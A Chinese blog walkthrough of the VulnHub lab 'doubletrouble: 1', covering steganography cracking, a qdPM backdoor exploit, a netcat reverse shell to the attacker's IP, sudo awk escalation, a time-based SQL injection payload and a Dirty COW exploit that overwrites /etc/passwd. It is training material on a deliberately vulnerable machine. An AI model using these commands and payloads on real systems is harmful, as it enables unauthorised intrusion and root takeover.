vulnhub之doubletrouble: 1

最新推荐文章于 2023-03-01 14:20:26 发布
最新推荐文章于 2023-03-01 14:20:26 发布
阅读量892 收藏 2
点赞数
分类专栏: Vulnhub 文章标签: 安全 php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/125073771
版权

目录

地址:

一、主机发现

二、端口扫描

三、服务版本发现

四、信息收集

1.来自开源cms  qdpm

(1)默认的文件夹/install和/core/cache/qdPM/

(2)php文件

​(3)其他文件

2.目录爆破

(1)可能有用的文件

(2)突破点/secret

 五、隐写图片

1.下载图片

2.确认是否隐写信息

3.stegcracker

(1)下载这个工具

(2)给了提示

4.下载stegseek

5.stegseek爆破

(1)字典选择

(2)出结果

 6.查看隐写的内容

六、cms—qdpm框架漏洞

1.搜索

2.cp到本地

3.修改payload的缩进

4.利用

5.反弹sehll

6.升级shell

 七、sudo 提权

1.sudo -l

2.网站:

3.sudo awk

提权成功:

4.发现第二台靶机

八、nc 下载到kali端

1.kali端侦听

2.服务端

九、Tabby工具

1.kali开启ssh服务

(1)更改ssh配置文件

将permitrootlogin(允许root登录)改为yes

公钥登录改为yes

(2)开启服务

systemctl start ssh

(3)查看状态

systemctl status ssh

(4)sftp传输文件

十、主机扫描

十一、端口扫描和服务版本发现

1.80 22

2.服务版本

3.80 http服务

(1)尝试弱口令

(2)密码复用

(3)注入永为真

(4)sql注入

十二、sql注入

1.burp抓包,将数据包保存到本地

2.sql -r 参数跑一下

3.通过时间盲注获得用户密码

(1)尝试登录web应用,

(2)尝试通过ssh登录

3.sql时间注入测试语句

 十三、脏牛漏洞提权

1.服务端侦听

2.kali端

3.利用

 4.效果

5.ssh登录

 6.恢复/etc/passwd文件

7.直接登录

地址:

https://download.vulnhub.com/doubletrouble/doubletrouble.ova.torrenthttps://download.vulnhub.com/doubletrouble/doubletrouble.ova.torrent

一、主机发现

二、端口扫描

三、服务版本发现

四、信息收集

1.来自开源cms  qdpm

(1)默认的文件夹/install和/core/cache/qdPM/

(2)php文件

如果有文件包含或者文件下载漏洞的话可以对这些文件进行查看。然而并没有

所以我们只能看到文件名,看不到内容,因为当我们点击这个文件的时候,服务器会解析php代码

(3)其他文件

最终也没有在其他文件中发现有用信息

2.目录爆破

(1)可能有用的文件

backup备份文件

readme.txt自述文件

robots.txt

但是这些文件都没有暴露出什么有效信息

(2)突破点/secret

在这个文件下藏了一张图片

 五、隐写图片

1.下载图片

wget http://192.168.43.183/secret/doubletrouble.jpg

2.确认是否隐写信息

embedded data 嵌入的资料

但是需要输入口令

 

3.stegcracker

(1)下载这个工具

 sudo apt install stegcracker

(2)给了提示

stegSeek比这个stegcracker爆破速度更快

4.下载stegseek

github

Releases · RickdeJager/stegseek · GitHubhttps://github.com/RickdeJager/stegseek/releases网盘:

链接:https://pan.baidu.com/s/1T_mNcZBZ-Cn2szauIlx87Q?pwd=1234
提取码:1234

5.stegseek爆破

(1)字典选择

(2)出结果

 6.查看隐写的内容

stegseek --crack doubletrouble.jpg -wl rockyou.txt -xf file

正好是邮箱加密码,可以直接登录后台,但是这并不能帮助我们突破边界

六、cms—qdpm框架漏洞

1.搜索

searchsploit qdpm -e

2.cp到本地

搜索路径

searchsploit -p 50175.py

3.修改payload的缩进

这个payload的缩进是有问题的,我们需要修改后利用

4.利用

给了我们一个后门连接,用法也有了,直接用反弹shell

5.反弹sehll

在网站url中加入反弹shell的参数

192.168.43.183//uploads/users/889996-backdoor.php?cmd=nc -e /bin/bash 192.168.43.27 1234

6.升级shell

 python3 -c 'import pty;pty.spawn("/bin/bash")'

 七、sudo 提权

1.sudo -l

查看有无sudo配置不当

2.网站:

GTFOBinshttps://gtfobins.github.io/

3.sudo awk

提权成功:

4.发现第二台靶机

八、nc 下载到kali端

1.kali端侦听

2.服务端

九、Tabby工具

这是一款开源的终端连接工具,github上可以下载

1.kali开启ssh服务

(1)更改ssh配置文件

将permitrootlogin(允许root登录)改为yes

公钥登录改为yes

(2)开启服务

systemctl start ssh

(3)查看状态

systemctl status ssh

(4)sftp传输文件

下载到windous本地后,导入virtual box后开始攻击

十、主机扫描

十一、端口扫描和服务版本发现

1.80 22

2.服务版本

3.80 http服务

是一个登录框,

(1)尝试弱口令

(2)密码复用

(3)注入永为真

(4)sql注入

十二、sql注入

1.burp抓包,将数据包保存到本地

2.sql -r 参数跑一下

发现参数uname有漏洞

3.通过时间盲注获得用户密码

(1)尝试登录web应用,

两个账户都不成功

(2)尝试通过ssh登录

第二个账号成功登录ssh

3.sql时间注入测试语句

' AND (SELECT x FROM (SELECT (sleep(10)))YZ) --

 十三、脏牛漏洞提权

内核版本:3.2.0-4

文件准备:github上有 dirtycow 脏牛

1.服务端侦听

nc -nvlp 4444 > exp.c

2.kali端

nc 192.168.43.17 4444 < dirty.c -w 1

3.利用

给权限

chmod 777 ./exp.c

编译

 gcc -pthread exp.c -o exp -l crypt

执行

./exp pass

 4.效果

(1)将系统管理员用户改为了 firefart

(2)密码为 pass

(3)并且将 /etc/passwd文件备份成/etc/passwd.bak

(4)/etc/passwd被修改了

5.ssh登录

 firefart在组群root里,拥有最高权限。

 6.恢复/etc/passwd文件

cp /tmp/passwd.bak /etc/passwd

并且修改掉了root用户密码,之后可以通过root直接登录

7.直接登录

梅_花_七
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 924
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 512
Vulnhub——DOUBLETROUBLE: 1
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 674
攻击机:192.168.100.128靶机:192.168.100.130。
vulnhunb之doubletrouble:1
qwweggfe的博客
09-18 1663
由于这个靶机比较简单,所以我就直接写渗透过程了: 首先进行ip扫描 于是打开网页进行查看 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描 NVD - CVE-2020-7246 gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html..
[Vulnhub]doubletrouble: 1
qq_48749937的博客
02-21 3921
kali ip:192.168.56.105 靶机ip:192.168.56.106 扫描靶机开放端口:nmap -sS -p- 192.168.56.106 访问http服务,发现一个登录界面
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
双重麻烦Bootcamp Innopolis项目2015
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
Vulnhub靶场】DOUBLETROUBLE: 1
DG_s1mple
03-14 489
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
(sqlmap)【sqli-labs11-20】爆破本地数据文件
07-07 1228
【SQLMAP-数据本地爆破】
Windows 上Burp Suite的安装与使用
weixin_45214325的博客
03-01 2321
已请求的项目显示为黑色,其他项目显示为灰色。选择此选项后,当项目重新打开时,Spider 和 Scanner 工具将自动暂停,以避免向现有已配置的目标发送任何无意的请求。完成上述工作后,进入Proxy–Intercept页面Intercept is off /on按钮是开启或关闭拦截功能,开启拦截功能后即可拦截请求信息,修改其中参数,然后点击Forward(放行)便可将修改过参数的请求发送至目标服务器。使用项目保存的选项 - 此选项在重新打开现有项目时可用,并将使用保存在工程文件中的配置打开项目。
burp改返回包(Burp Suite抓包使用步骤)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-20 8041
burp改返回包方法:burp改返回包在抓到包之后, 然后设置Action:do intercept -> response to this request (burp改返回包),点击Forward即可。 下面介绍Burp Suite抓包使用步骤 1、打开Burp.调整Proxy-Intercept-Intercept is on为‘Intercept is off’(拦截器开关) ​2、在火狐中打开需要拦截的网页,(比如同charlse博客里面写到的上传1.txt文件),点击上传文件按钮
BurpSuite 的导入和导出
kevinhanser
07-12 9056
使用的版本为 burpsuite_pro_v2020.6.jar BurpSuite 的导入和导出 2020年7月12日10:54:51【原创】 1. 简介 主要目的是使用burp记录浏览记录,并保存成文件 2. 导出 导出整个项目成 .burp 文件 位置:Project -> Save copy 优点:跨平台分享项目中所有浏览记录 测试:二进制文件 先尽情的抓包,然后保存即可,可以只选择保存 Proxy的内容,也可以全都保存。 2. 导出单个浏览记录 位置: Proxy -> 选.
Burp Suite抓取gzip数据包
zyw_anquan的专栏
03-02 6693
Burp Suite抓取gzip数据包 测试环境 [+]JDK 1.8.0_45 [+]Burp Suite 1.6.27 [+]WinHex 14.2 SR-3 [+]WinRAR 5.21 下载地址: [+]JDK 1.8.0_45 [+]Burp Suite 1.6.27 一、抓包 Burp Suite抓包方式详见:Burp Suite抓HTTPS数据包(通用)
burpsuite保存请求日志文件
xj28555的博客
08-17 4217
首先打开burpsuite,然后i点击options 在logging里面proxy栏目下勾选requests 然后创建文件名字 返回桌面会出现一个test的文件夹 然后我们抓包,产生的请求都会保存到这个test文件里面。
渗透测试之BurpSuite工具的使用介绍(一)
cmdos的专栏
03-13 1547
一、BurpSuite功能模块介绍:Proxy——是一个拦截 HTTP /S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Spider——是一个应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能。Scanner[仅限专业版]——是一个高级的工具,执行后,它能自动地发现 web应用程序的安全漏洞。Intruder——是一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用 fuzzing技术探测常
burp数据包参数详解
m0_51581045的博客
11-08 2521
写给我好学的徒弟吴doc
[Web安全入门]BURP基本使用详解
热门推荐
_DESpiSED的博客
09-17 1万+
本文详细介绍BURP的基本使用方式,适合小白观看
burp抓手机数据包
H4ppyD0g的博客
11-29 2501
文章目录burp抓普通数据包导入证书抓https数据包 说明:如果只是抓手机的http的数据包则不需要导入证书,但是如果抓https数据包的话,则需要导入证书。 burp抓普通数据包 首先手机和电脑都连校园网2.4G 电脑查看ip10.195.230.213 burp下设置代理 手机端配置 选择代理=>手动,设置主机名和端口为burp配置设置 然后设置burp开启拦截模式,手机在浏览器输入url之后在burp可以看到拦截的数据包。 导入证书抓https数据包 burp导出数据包,文件后缀命名为.ce
doubletrouble靶机
最新发布
08-29
第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值